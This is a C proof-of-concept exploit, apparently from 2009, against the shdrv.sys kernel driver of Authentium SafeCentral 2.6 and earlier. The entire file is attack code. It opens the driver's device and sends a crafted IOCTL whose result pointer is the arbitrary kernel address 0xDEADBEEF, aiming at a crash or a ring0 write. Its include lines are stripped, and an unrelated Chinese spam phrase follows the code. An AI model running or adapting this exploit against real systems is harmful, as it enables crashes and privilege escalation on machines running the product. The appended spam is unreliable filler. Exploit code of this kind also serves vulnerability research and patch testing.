/* safecentral-unharden.c * * Copyright (c) 2009 by * * Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM POC * by mu-b - Tue 1 Sep 2009 * * - Tested on: shdrv.sys 2.0.0.128 * * Compile: MinGW + -lntdll * * - this exploit is provided for educational purposes _only_. You are free * to use this code in any way you wish provided you do not work for, or * are associated in any way with Portcullis Computer Security Ltd. * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2009!@$! */ #include #include #include #define SAFECNTRL_IOCTL 0x00226003 struct ioctl_req { DWORD action; DWORD *args; DWORD *result; }; int main (int argc, char **argv) { struct ioctl_req req; HANDLE hFile, hEvent; OVERLAPPED olStruct; BOOL bResult; DWORD args[2], rlen; printf ("Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM PoC\n" "by: \n" "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n"); fflush (stdout); hFile = CreateFileA ("\\\\.\\ShDev", GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL); if (hFile == INVALID_HANDLE_VALUE) { fprintf (stderr, "* CreateFileA failed, %d\n", hFile); exit (EXIT_FAILURE); } memset (&req, 0, sizeof req); req.action = 8; req.args = args; req.result = (DWORD *) 0xDEADBEEF; memset (&olStruct, 0, sizeof olStruct); olStruct.hEvent = CreateEventW (NULL, TRUE, FALSE, NULL); if (!olStruct.hEvent) { fprintf (stderr, "* CreateEventW failed\n"); exit (EXIT_FAILURE); } bResult = DeviceIoControl (hFile, SAFECNTRL_IOCTL, &req, sizeof req, NULL, 0, &rlen, &olStruct); if (!bResult) { fprintf (stderr, "* DeviceIoControl failed\n"); exit (EXIT_FAILURE); } bResult = GetOverlappedResult (hFile, &olStruct, &rlen, 1); if (!bResult) { fprintf (stderr, "* GetOverlappedResult failed\n"); exit (EXIT_FAILURE); } printf ("* hmmm, you didn't STOP the box?!?!\n"); CloseHandle (hFile); return (EXIT_SUCCESS); }

亚洲欧美在线